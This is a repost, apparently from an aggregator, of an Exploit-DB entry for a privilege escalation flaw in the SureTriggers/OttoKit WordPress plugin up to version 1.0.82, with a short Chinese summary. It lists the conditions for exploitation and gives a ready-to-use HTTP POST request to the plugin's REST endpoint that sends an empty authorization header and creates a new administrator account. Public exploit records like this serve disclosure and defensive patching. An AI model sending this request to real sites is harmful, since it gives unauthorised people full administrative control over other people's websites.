[webapps] SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
文章揭示了SureTriggers OttoKit插件版本≤1.0.82中的一个特权提升漏洞。当插件未初始化且目标站点暴露特定REST API端点时,攻击者可利用此漏洞创建具有管理员权限的新账户。 2025-5-9 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:10 收藏
文章揭示了SureTriggers OttoKit插件版本≤1.0.82中的一个特权提升漏洞。当插件未初始化且目标站点暴露特定REST API端点时,攻击者可利用此漏洞创建具有管理员权限的新账户。 2025-5-9 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:10 收藏
# Exploit Title: SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
# Date: 2025-05-7
# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)
# Affected: Versions All versions of OttoKit (SureTriggers) ≤ 1.0.82.
Conditions for Exploitation
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#conditions-for-exploitation>
The vulnerability can be exploited under the following circumstances:
1. OttoKit must be installed and activated on the target WordPress site.
2. The plugin *uninitialized* (e.g., no API key or "secret_key" is set
in the database).
3. The target site displays the REST API endpoint
'/wp-json/sure-triggers/v1/automation/action'.
------------------------------
HTTP Request
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#http-request>
The following request targets the
/wp-json/sure-triggers/v1/automation/action endpoint to create an
administrator account:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email]=
[email protected]&selected_options[password]=StrongP@ssw0rd123
&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists
文章来源: https://www.exploit-db.com/exploits/52286
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh